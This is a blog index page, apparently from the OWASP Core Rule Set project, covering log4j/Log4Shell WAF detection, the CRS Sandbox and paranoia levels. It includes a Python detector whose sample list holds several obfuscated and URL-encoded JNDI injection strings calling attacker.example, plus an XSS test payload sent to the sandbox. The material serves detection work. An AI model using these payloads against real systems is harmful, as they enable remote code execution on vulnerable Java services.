Blog

Public Hunt for log4j / log4shell Evasions / WAF Bypasses

We have been updating our detection for the infamous CVE-2021-44228 vulnerability and its siblings for several days now. With the new experimental rule 1005 we believe we now have decent detection coverage. Read up on this development in the separate blog post CRS and Log4j / Log4Shell / CVE-2021-44228. Right before the log4j CVE …


CRS and Log4j / Log4Shell / CVE-2021-44228

This is an evolving blog post with information about the role of CRS in defending against the log4j vulnerabilities that threaten nearly all Java applications that use log4j for logging. We believe the mitigations and rules suggested below will have you covered up to and including CVE-2021-45105. In January 2022 we consolidated our knowledge into a pull request with …
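The two log4j posts above are about evasions of the obvious `${jndi:` signature. The following is an added illustration of the kind of bypass the public hunt targets; it is not CRS rule 1005 and not code from the CRS project. It models only the part of log4j 2.x string substitution that the known obfuscations rely on (innermost lookups resolved first, `:-` default values, the `lower`/`upper` lookups), so the lookup set is an assumption and narrower than real log4j. All sample lines and host names are constructed.

```python
"""Normalise log4j lookup obfuscations before checking for a JNDI lookup.

Added example, not CRS rule 1005 and not code from the CRS project. It
reproduces the small part of log4j 2.x string substitution that the
public bypasses lean on: innermost ${...} expressions are resolved first,
':-' supplies a default when a lookup yields nothing, and the lower/upper
lookups change case. A plain search for the literal '${jndi:' sees none of
that, which is the whole point of the evasion hunt.
"""
import re
from urllib.parse import unquote

# An innermost lookup: ${...} whose body contains no further '${' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are actually looking for once the noise is gone.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_one(body: str) -> str:
    """Resolve one nesting-free lookup body roughly the way log4j would.

    Only the lookups the evasions rely on are modelled (assumption: real
    log4j has many more, e.g. env/sys/date, which are left untouched here).
    """
    key, has_default, default = body.partition(":-")
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if has_default:
        # ${::-j}, ${env:DOESNOTEXIST:-j}: unresolved lookup, default wins.
        return default
    # Unknown lookup without a default stays as written; this is where a
    # fully de-obfuscated ${jndi:...} ends up.
    return "${" + body + "}"


def normalise(s: str, max_rounds: int = 32) -> str:
    """Repeatedly resolve innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: resolve_one(m.group(1)), s)
        if new == s:
            break
        s = new
    return s


def naive_match(raw: str) -> bool:
    """The check a hurried signature would do: literal '${jndi:' only."""
    return "${jndi:" in raw


def detect_jndi(raw: str) -> bool:
    """URL-decode once (a WAF sees decoded parameters), de-obfuscate, match."""
    return JNDI.search(normalise(unquote(raw))) is not None


# Constructed samples, not captured traffic. Host names are placeholders.
SAMPLES = [
    ("${jndi:ldap://attacker.example/a}", True),
    ("${${lower:j}ndi:ldap://attacker.example/a}", True),
    ("${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}", True),
    ("${${env:NOPE:-j}ndi:${lower:LDAP}://attacker.example/a}", True),
    ("${${upper:j}${upper:n}${::-d}i:rmi://attacker.example/a}", True),
    ("%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D", True),
    ("${date:yyyy-MM-dd} GET /index.html 200", False),
    ("Mozilla/5.0 (compatible; ${env:HOME})", False),
]


def scan(samples=SAMPLES):
    """Return (naive_hits, normalised_hits, mistakes) over the samples."""
    naive_hits = sum(naive_match(s) for s, _ in samples)
    norm_hits = sum(detect_jndi(s) for s, _ in samples)
    mistakes = [s for s, expected in samples if detect_jndi(s) != expected]
    return naive_hits, norm_hits, mistakes


if __name__ == "__main__":
    for raw, _ in SAMPLES:
        flag = "JNDI " if detect_jndi(raw) else "     "
        print(f"{flag} {normalise(unquote(raw))}")
    print(scan())
```

Of the six constructed attack lines only the first is caught by the literal `${jndi:` check, while all six reduce to a plain `${jndi:` after normalisation; the two benign lines stay benign. This is the gap a WAF rule has to close, and why a single fixed string is not a detection.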


Introducing the CRS Sandbox

The OWASP ModSecurity Core Rule Set project is very happy to present the CRS Sandbox. It's an API that allows you to test an attack payload against CRS without the need to install a ModSecurity box or anything. Here is how to do this:

$ curl -H "x-format-output: txt-matched-rules" "https://sandbox.coreruleset.org/?search=<script>alert('CRS+Sandbox+Release')</script>"
941100 PL1 XSS Attack Detected via …
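As an added example (not the CRS project's own client), here is a small Python wrapper around the sandbox call shown above that parses the matched-rule lines and filters them by Paranoia Level, so you can see whether a payload would be caught by a site running at PL1 rather than only that some rule fired. The endpoint and the `x-format-output: txt-matched-rules` header are from the post; the line shape `<rule id> PL<n> <message>` is assumed from the single output line the post shows, and the sample output below is constructed so the parsing runs without network access.

```python
"""Send payloads to the CRS Sandbox and parse the matched-rule lines.

Added example, not the CRS project's own client. The endpoint and the
x-format-output: txt-matched-rules header come from the post; the line
shape "<rule id> PL<n> <message>" is assumed from the one output line the
post shows. The sample output below is constructed so the parsing and the
paranoia-level filtering can run without network access.
"""
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

SANDBOX = "https://sandbox.coreruleset.org/"
MATCHED = re.compile(r"^(\d{6})\s+PL(\d)\s+(.*)$")


def parse_matched_rules(text: str) -> list[tuple[str, int, str]]:
    """Turn the txt-matched-rules body into (rule id, PL, message) tuples."""
    rules = []
    for line in text.splitlines():
        m = MATCHED.match(line.strip())
        if m:
            rules.append((m.group(1), int(m.group(2)), m.group(3)))
    return rules


def query_sandbox(payload: str, param: str = "search", timeout: float = 15.0):
    """Live query: the payload goes in a query-string parameter, as in the post."""
    req = Request(SANDBOX + "?" + urlencode({param: payload}),
                  headers={"x-format-output": "txt-matched-rules"})
    with urlopen(req, timeout=timeout) as resp:
        return parse_matched_rules(resp.read().decode("utf-8", "replace"))


def rules_active_at(rules, paranoia_level: int):
    """Rules that would fire in a deployment running at this Paranoia Level.

    A rule tagged PLn is only active when the configured level is >= n, so
    a PL2 match tells you nothing about a PL1 site.
    """
    return [r for r in rules if r[1] <= paranoia_level]


def lowest_detecting_level(rules):
    """Lowest Paranoia Level at which at least one rule matched, or None."""
    return min((r[1] for r in rules), default=None)


# Constructed sample in the assumed line shape; the first line is the one
# the post shows, the others are illustrative and not real sandbox output.
SAMPLE_OUTPUT = """\
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL2 XSS Filter - Category 5: Disallowed HTML Attributes
949110 PL1 Inbound Anomaly Score Exceeded (Total Score: 15)
"""

if __name__ == "__main__":
    rules = parse_matched_rules(SAMPLE_OUTPUT)  # swap for query_sandbox(...)
    print("lowest PL with a match:", lowest_detecting_level(rules))
    for level in (1, 2, 3, 4):
        ids = [rid for rid, _, _ in rules_active_at(rules, level)]
        print(f"PL{level}: {ids}")
```

Replace `parse_matched_rules(SAMPLE_OUTPUT)` with `query_sandbox(payload)` to test a real payload; a payload whose only matches are PL2 or higher is one a default PL1 installation will let through, which is usually the interesting finding.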


CRS Developer Retreat 2021

The OWASP ModSecurity Core Rule Set team met for a one week developer retreat in the Swiss mountains to hack away at CRS together. We worked on several larger projects and ran seven additional workshops, all documented on our GitHub wiki. Why Switzerland? Switzerland is an expensive place, but most of our active developers live …


Working with Paranoia Levels

Paranoia Levels are an essential concept when working with the Core Rule Set. This blog post explains the concept behind Paranoia Levels and how you can work with them in practice.

Introduction to Paranoia Levels

In essence, the Paranoia Level (PL) allows you to define how aggressive the Core Rule Set is. …


A new attempt to combine the CRS with machine learning

The following is a contributing blog post by Floriane Gilliéron. You can reach Floriane via firstname dot lastname at gmail.com. My Master's thesis at EPFL tackled the challenge of using machine learning to improve the performance of a ModSecurity web application firewall used with the OWASP Core Rule Set. The initiators of the project were …
